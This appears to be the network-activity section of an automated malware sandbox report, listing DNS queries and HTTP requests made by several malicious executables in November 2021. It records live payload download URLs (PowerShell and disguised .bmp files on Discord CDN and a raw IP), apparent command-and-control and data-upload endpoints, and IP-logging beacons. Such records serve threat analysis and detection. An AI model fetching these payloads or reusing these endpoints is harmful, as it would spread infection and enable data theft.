      Vary: Accept-Encoding
      CF-Cache-Status: HIT
      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      x-goog-generation: 1636266184911820
      x-goog-hash: crc32c=VMZwDw==
      x-goog-hash: md5=dK1SjrellWfnRf1IlPLUWA==
      x-goog-metageneration: 1
      x-goog-storage-class: STANDARD
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 1335812
      X-GUploader-UploadID: ADPycdt53Xx1HiS_dTrBpGZARlg4NWMItAXIjW_xFv9_aKjRdZRYHyX-R2L0P2V2f-2nRChjGV9KdKytseI2a1xSU1Y
      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X8j9cwE9bhL4LvgMAx%2Be1Ji%2BJLqFYOzBFNvIHecSye5USjjRb2yxHbFk%2FMxOiXW2CeLHbNFT92fWmOfozNSN6Pyb83G2OVfwTEAogqlt3WxxoqYY29hzQtCnnm7foRmTwXuKCg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
    • flag-us
      DNS
      staticimg.youtuuee.com
      Files.exe
      Remote address:
      8.8.8.8:53
      Request
      staticimg.youtuuee.com
      IN A
      Response
      staticimg.youtuuee.com
      IN A
      45.136.151.102
    • flag-us
      GET
      http://staticimg.youtuuee.com/api/fbtime
      Files.exe
      Remote address:
      45.136.151.102:80
      Request
      GET /api/fbtime HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
      Host: staticimg.youtuuee.com
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Powered-By: PHP/7.4.21
    • flag-us
      POST
      http://staticimg.youtuuee.com/api/?sid=5210873&key=bb7daacc20701a5044aec0c05a863a05
      Files.exe
      Remote address:
      45.136.151.102:80
      Request
      POST /api/?sid=5210873&key=bb7daacc20701a5044aec0c05a863a05 HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
      Content-Length: 294
      Host: staticimg.youtuuee.com
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Powered-By: PHP/7.4.21
    • flag-us
      DNS
      ipinfo.io
      File.exe
      Remote address:
      8.8.8.8:53
      Request
      ipinfo.io
      IN A
      Response
      ipinfo.io
      IN A
      34.117.59.81
    • flag-us
      GET
      https://ipinfo.io/widget
      File.exe
      Remote address:
      34.117.59.81:443
      Request
      GET /widget HTTP/1.1
      Connection: Keep-Alive
      Referer: https://ipinfo.io/
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Host: ipinfo.io
      Response
      HTTP/1.1 200 OK
      access-control-allow-origin: *
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-type: application/json; charset=utf-8
      content-length: 893
      date: Tue, 09 Nov 2021 13:23:11 GMT
      x-envoy-upstream-service-time: 32
      vary: Accept-Encoding
      Via: 1.1 google
      Alt-Svc: clear
    • flag-us
      GET
      https://cdn.discordapp.com/attachments/523238636561629190/894846882596126762/rkit.ps1
      Graphicss.exe
      Remote address:
      162.159.135.233:443
      Request
      GET /attachments/523238636561629190/894846882596126762/rkit.ps1 HTTP/1.1
      Host: cdn.discordapp.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Content-Type: text/plain;%20charset=utf-8
      Content-Length: 6117
      Connection: keep-alive
      CF-Ray: 6ab75aaf9f1a4c4f-AMS
      Accept-Ranges: bytes
      Cache-Control: public, max-age=31536000
      Content-Disposition: attachment;%20filename=rkit.ps1
      ETag: "71f45dee42b2fb64e82d68b7d4575ea6"
      Expires: Wed, 09 Nov 2022 13:23:12 GMT
      Last-Modified: Tue, 05 Oct 2021 07:22:02 GMT
      Vary: Accept-Encoding
      CF-Cache-Status: MISS
      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      x-goog-generation: 1633418522320185
      x-goog-hash: crc32c=+eg+Lg==
      x-goog-hash: md5=cfRd7kKy+2ToLWi31Fdepg==
      x-goog-metageneration: 1
      x-goog-storage-class: STANDARD
      x-goog-stored-content-encoding: identity
      x-goog-stored-content-length: 6117
      X-GUploader-UploadID: ADPycdt1grvJB7pGxdlnNxiMK7kIRQ5Xj7XW2grhkwc_tDDP3f4ggV3g6N2K3dYssYfD2-kq_nvyowAkM611w0MSC4Q
      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0QParheVoV3HI6cMfTz4E%2FH3rU8TciRcJyL62xLVxV97Xbjz2NJfRt%2BRdO%2F%2FXRhzZzoG2ikd02KsBUgA7OiCO0SqcUj44GxeRn59zY8XMxmS5mTIJHm%2FuPvGzjPkLvFqssIRhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
    • flag-us
      DNS
      topniemannpickshop.cc
      FoxSBrowser.exe
      Remote address:
      8.8.8.8:53
      Request
      topniemannpickshop.cc
      IN A
      Response
    • flag-us
      DNS
      niemannbest.me
      FoxSBrowser.exe
      Remote address:
      8.8.8.8:53
      Request
      niemannbest.me
      IN A
      Response
      niemannbest.me
      IN A
      104.21.51.48
      niemannbest.me
      IN A
      172.67.221.103
    • flag-nl
      POST
      http://212.192.241.15/base/api/getData.php
      File.exe
      Remote address:
      212.192.241.15:80
      Request
      POST /base/api/getData.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Content-Length: 1905
      Host: 212.192.241.15
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:11 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      X-Powered-By: PHP/7.3.28
      Content-Length: 108
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-nl
      POST
      http://212.192.241.15/base/api/getData.php
      File.exe
      Remote address:
      212.192.241.15:80
      Request
      POST /base/api/getData.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Content-Length: 133
      Host: 212.192.241.15
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      X-Powered-By: PHP/7.3.28
      Content-Length: 108
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-us
      GET
      https://niemannbest.me/?username=seo1
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo1 HTTP/1.1
      Host: niemannbest.me
      Connection: Keep-Alive
      Response
      HTTP/1.1 522
      Date: Tue, 09 Nov 2021 13:23:43 GMT
      Content-Length: 0
      Connection: keep-alive
      cache-control: no-store, no-cache
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fY5cXUBP04tkcZxruGfxXel7loYlVlv2ajIMFuWBLOM%2FBK3t3tYwTJN6lM4rp0hb6DrXm%2BcsccPIw2pgb6OxptyeTumwyFUkM0fK4d5QfNRsZtrMeJBqmqzruxM3ZTG%2FaA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75ab1b8550c71-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      GET
      https://niemannbest.me/?username=seo2
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo2 HTTP/1.1
      Host: niemannbest.me
      Response
      HTTP/1.1 522
      Date: Tue, 09 Nov 2021 13:24:17 GMT
      Content-Length: 0
      Connection: keep-alive
      cache-control: no-store, no-cache
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5tpkNtE71HjUvurojmVBZmU9BKcEeiyXXm6sgT98lU5vjFs7uX5AG2At5xWp82irVKSxZvqZj6Dvmdqh0dZNS%2FNrh3wNy8zpe%2BbrjHQnB5GuialxM9F9wpKaYae7ZbQjFg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75b86d80f0c71-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      GET
      https://niemannbest.me/?username=seo3
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo3 HTTP/1.1
      Host: niemannbest.me
      Response
      HTTP/1.1 522
      Date: Tue, 09 Nov 2021 13:24:48 GMT
      Content-Length: 0
      Connection: keep-alive
      cache-control: no-store, no-cache
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lmDNFA5VPUfknqQlZCGXj9iyBtnvswKb28G3IDmXUjF8vIZMh6S9eRHD7vWPJIIoRe%2FhZATpFDno2nXmABgRNWTPE7y3gE5z%2BYTIHyQrwpGbM%2FN8tLfGkGkb8NYWoFJ2wg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75c481e0f0c71-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      GET
      https://niemannbest.me/?username=seo4
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo4 HTTP/1.1
      Host: niemannbest.me
      Response
      HTTP/1.1 522
      Date: Tue, 09 Nov 2021 13:25:19 GMT
      Content-Length: 0
      Connection: keep-alive
      cache-control: no-store, no-cache
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GM0YjSA3ditOYMEbqpiHMCsdCJwu9yMmAe8zDKJNUxHKd1Uvb3In1jwNNHVFhmDpmnftuVq7cQYevcB1PxMpWFIh6JT46K8MCvMpSgeGrajG%2BTqCjynGsl5tCcVWPK1aPg%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75d0b5a6a0c71-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      GET
      https://niemannbest.me/?username=seo5
      FoxSBrowser.exe
      Remote address:
      104.21.51.48:443
      Request
      GET /?username=seo5 HTTP/1.1
      Host: niemannbest.me
    • flag-nl
      HEAD
      http://45.133.1.107/download/NiceProcessX64.bmp
      File.exe
      Remote address:
      45.133.1.107:80
      Request
      HEAD /download/NiceProcessX64.bmp HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Host: 45.133.1.107
      Content-Length: 0
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
      ETag: "4fa00-5cbb9fe84ddf3"
      Accept-Ranges: bytes
      Content-Length: 326144
      Content-Type: image/x-ms-bmp
    • flag-nl
      GET
      http://45.133.1.107/download/NiceProcessX64.bmp
      File.exe
      Remote address:
      45.133.1.107:80
      Request
      GET /download/NiceProcessX64.bmp HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Host: 45.133.1.107
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:12 GMT
      Server: Apache/2.4.41 (Ubuntu)
      Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
      ETag: "4fa00-5cbb9fe84ddf3"
      Accept-Ranges: bytes
      Content-Length: 326144
      Content-Type: image/x-ms-bmp
    • flag-nl
      POST
      http://212.192.241.15/base/api/getData.php
      File.exe
      Remote address:
      212.192.241.15:80
      Request
      POST /base/api/getData.php HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
      Content-Length: 133
      Host: 212.192.241.15
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:18 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      X-Powered-By: PHP/7.3.28
      Content-Length: 5504
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html; charset=UTF-8
    • flag-us
      GET
      http://ip-api.com/json/?fields=8198
      SystemNetworkService
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=8198 HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: ip-api.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:33 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 57
      Access-Control-Allow-Origin: *
      X-Ttl: 20
      X-Rl: 27
    • flag-us
      GET
      http://ip-api.com/json/?fields=8198
      SystemNetworkService
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=8198 HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: ip-api.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:46 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 57
      Access-Control-Allow-Origin: *
      X-Ttl: 7
      X-Rl: 22
    • flag-us
      GET
      http://ip-api.com/json/?fields=8198
      SystemNetworkService
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=8198 HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: ip-api.com
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:47 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 57
      Access-Control-Allow-Origin: *
      X-Ttl: 6
      X-Rl: 21
    • flag-us
      DNS
      bh.mygameadmin.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      bh.mygameadmin.com
      IN A
      Response
      bh.mygameadmin.com
      IN A
      172.67.213.194
      bh.mygameadmin.com
      IN A
      104.21.75.46
    • flag-us
      POST
      https://bh.mygameadmin.com/report7.4.php
      SystemNetworkService
      Remote address:
      172.67.213.194:443
      Request
      POST /report7.4.php HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: bh.mygameadmin.com
      Content-Length: 274
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:47 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      vary: Accept-Encoding
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jvh91JTyTvm5DrLh8Ws0QBi7vb4gWYwxqhtFtwAWHD%2BqL5FuyCgK7V4hlzglMlyAfjZUY84ALKsO%2FHv5aSbdUEk6enpdPV9yLYRJvEz9QklzaOEuyYfCRCNuWVgbVGV50g7pSxA%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75b878898417a-HAM
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-de
      GET
      https://iplogger.org/1h49r7
      IEXPLORE.EXE
      Remote address:
      88.99.66.31:443
      Request
      GET /1h49r7 HTTP/1.1
      Accept: text/html, application/xhtml+xml, */*
      Accept-Language: en-US
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Accept-Encoding: gzip, deflate
      Host: iplogger.org
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:46 GMT
      Content-Type: image/png
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=td224ltvuq1hlg0c5vubj5s5p5; path=/; HttpOnly
      Pragma: no-cache
      Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=242583965; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
      Cache-Control: no-cache
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Answers:
      whoami: b67ec23f4466f7452c81aed606c852615f0ddbae2755f3228dc6f5a050c1e8fd
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
    • flag-de
      GET
      https://iplogger.org/favicon.ico
      IEXPLORE.EXE
      Remote address:
      88.99.66.31:443
      Request
      GET /favicon.ico HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
      Host: iplogger.org
      Connection: Keep-Alive
      Cookie: PHPSESSID=td224ltvuq1hlg0c5vubj5s5p5; clhf03028ja=154.61.71.51
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Tue, 09 Nov 2021 13:23:46 GMT
      Content-Type: image/x-icon
      Content-Length: 16446
      Last-Modified: Wed, 17 Mar 2021 07:14:34 GMT
      Connection: keep-alive
      ETag: "6051ac5a-403e"
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Cache-Control: no-cache
      Strict-Transport-Security: max-age=31536000; preload
      X-Frame-Options: DENY
      Accept-Ranges: bytes
    • flag-us
      DNS
      www.microsoft.com
      SystemNetworkService
      Remote address:
      8.8.8.8:53
      Request
      www.microsoft.com
      IN A
      Response
      www.microsoft.com
      IN CNAME
      www.microsoft.com-c-3.edgekey.net
      www.microsoft.com-c-3.edgekey.net
      IN CNAME
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
      IN CNAME
      e13678.dscb.akamaiedge.net
      e13678.dscb.akamaiedge.net
      IN A
      104.85.1.163
    • flag-us
      DNS
      all-mobile-pa1ments.com.mx
      FoxSBrowser.exe
      Remote address:
      8.8.8.8:53
      Request
      all-mobile-pa1ments.com.mx
      IN A
      Response
    • flag-us
      DNS
      buy-fantasy-football.com.sg
      FoxSBrowser.exe
      Remote address:
      8.8.8.8:53
      Request
      buy-fantasy-football.com.sg
      IN A
      Response
    • flag-us
      POST
      https://bh.mygameadmin.com/report7.4.php
      SystemNetworkService
      Remote address:
      172.67.213.194:443
      Request
      POST /report7.4.php HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: bh.mygameadmin.com
      Content-Length: 274
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:47 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      vary: Accept-Encoding
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kE9iOYDb%2BFeYzuZ8FSinAeLpHXjZNy3A86o9FaT3Fw0uU9OrX1cr%2Bm9C5sVzcss%2F3C8omCLRXN4ZnoWuDnLG6A5BrcpuBCT3G9l5JJVji3ELFD7YhzHlEzlKlXNJugOygSioalg%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75b8c0aa87270-HAM
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      POST
      https://bh.mygameadmin.com/report7.4.php
      SystemNetworkService
      Remote address:
      172.67.213.194:443
      Request
      POST /report7.4.php HTTP/1.1
      Accept: */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
      Host: bh.mygameadmin.com
      Content-Length: 250
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Tue, 09 Nov 2021 13:23:48 GMT
      Content-Type: application/json; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      vary: Accept-Encoding
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0x0Cr4XbLvZE4g50hL%2Bn8C9pGHZ4D4ZUY%2BzW77n4NUDCkazxwCcK3rhuXRAk7aGTXrH%2Fn4E5mtMBhTiailb4nnWZzo5lGStFEFdzTznMmxzUtLmKI%2Fc0jFFHGb6F3vYfRPaei6k%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 6ab75b916a704169-HAM
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    • flag-us
      DNS
      ggg-cl.biz
      Details.exe
      Remote address:
      8.8.8.8:53
      Request
      ggg-cl.biz
      IN A
      Response
    • flag-us
      DNS
      ggg-cl.biz
      Details.exe
      Remote address:
      8.8.8.8:53
      Request
      ggg-cl.biz
      IN A
      Response
    • flag-us
      DNS
      gmpeople.com
      Remote address:
      8.8.8.8:53
      Request
      gmpeople.com
      IN A
      Response
      gmpeople.com
      IN A
      187.212.183.165
      gmpeople.com
      IN A
      118.33.109.122
      gmpeople.com
      IN A
      210.207.244.101
      gmpeople.com
      IN A
      177.206.228.123
      gmpeople.com
      IN A
      89.133.230.171
      gmpeople.com
      IN A
      189.165.94.67
      gmpeople.com
      IN A
      186.6.254.27
      gmpeople.com
      IN A
      190.117.75.91
      gmpeople.com
      IN A
      181.129.180.251
      gmpeople.com
      IN A
      190.218.32.60
    • flag-us
      DNS
      ggg-cl.biz
      Details.exe
      Remote address:
      8.8.8.8:53
      Request
      ggg-cl.biz
      IN A
      Response
    • flag-us
      DNS
      ggg-cl.biz
      Details.exe
      Remote address:
      8.8.8.8:53
      Request
      ggg-cl.biz
      IN A
      Response
    • flag-kr
      POST
      http://gmpeople.com/upload/
      Remote address:
      118.33.109.122:80
      Request
      POST /upload/ HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      Accept: */*
      Referer: http://gmpeople.com/upload/
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
      Content-Length: 180
      Host: gmpeople.com
    • flag-us
      DNS
      mile48.com
      Remote address:
      8.8.8.8:53
      Request
      mile48.com
      IN A
      Response
    • flag-us
      DNS
      lecanardstsornin.com
      Remote address:
      8.8.8.8:53
      Request
      lecanardstsornin.com
      IN A
    • 45.133.1.107:80
      http://45.133.1.107/server.txt
      http
      File.exe
      482 B
       858 B
       6
      6

      HTTP Request

      GET http://45.133.1.107/server.txt

      HTTP Response

      200
    • 186.2.171.3:80
      http://186.2.171.3/seemorebty/il.php?e=md9_1sjm
      http
      md9_1sjm.exe
      648 B
       928 B
       5
      4

      HTTP Request

      GET http://186.2.171.3/seemorebty/il.php?e=md9_1sjm

      HTTP Response

      200
    • 212.192.241.15:80
      http://212.192.241.15/base/api/statistics.php
      http
      File.exe
      497 B
       910 B
       6
      5

      HTTP Request

      GET http://212.192.241.15/base/api/statistics.php

      HTTP Response

      200
    • 88.99.66.31:443
      https://iplogger.org/Zm8g4
      tls, http
      md9_1sjm.exe
      1.2kB
       7.0kB
       11
      10

      HTTP Request

      GET https://iplogger.org/Zm8g4

      HTTP Response

      200
    • 208.95.112.1:80
      http://ip-api.com/json/
      http
      Files.exe
      728 B
       592 B
       5
      2

      HTTP Request

      GET http://ip-api.com/json/

      HTTP Response

      200
    • 162.159.135.233:80
      cdn.discordapp.com
      tls
      File.exe
      399 B
       528 B
       5
      5
    • 162.159.135.233:80
      cdn.discordapp.com
      tls
      File.exe
      361 B
       528 B
       5
      5
    • 162.159.135.233:80
      cdn.discordapp.com
      tls
      File.exe
      288 B
       528 B
       5
      5
    • 162.159.135.233:80
      cdn.discordapp.com
      File.exe
      190 B
       92 B
       4
      2
    • 162.159.135.233:443
      https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp
      tls, http
      File.exe
      25.1kB
       1.4MB
       532
      968

      HTTP Request

      GET https://cdn.discordapp.com/attachments/891021838312931420/906790845167063140/PL_Client.bmp

      HTTP Response

      200
    • 45.136.151.102:80
      http://staticimg.youtuuee.com/api/?sid=5210873&key=bb7daacc20701a5044aec0c05a863a05
      http
      Files.exe
      1.2kB
       802 B
       8
      7

      HTTP Request

      GET http://staticimg.youtuuee.com/api/fbtime

      HTTP Response

      200

      HTTP Request

      POST http://staticimg.youtuuee.com/api/?sid=5210873&key=bb7daacc20701a5044aec0c05a863a05

      HTTP Response

      200
    • 34.117.59.81:443
      https://ipinfo.io/widget
      tls, http
      File.exe
      870 B
       7.7kB
       8
      10

      HTTP Request

      GET https://ipinfo.io/widget

      HTTP Response

      200
    • 162.159.135.233:443
      https://cdn.discordapp.com/attachments/523238636561629190/894846882596126762/rkit.ps1
      tls, http
      Graphicss.exe
      941 B
       10.9kB
       11
      14

      HTTP Request

      GET https://cdn.discordapp.com/attachments/523238636561629190/894846882596126762/rkit.ps1

      HTTP Response

      200
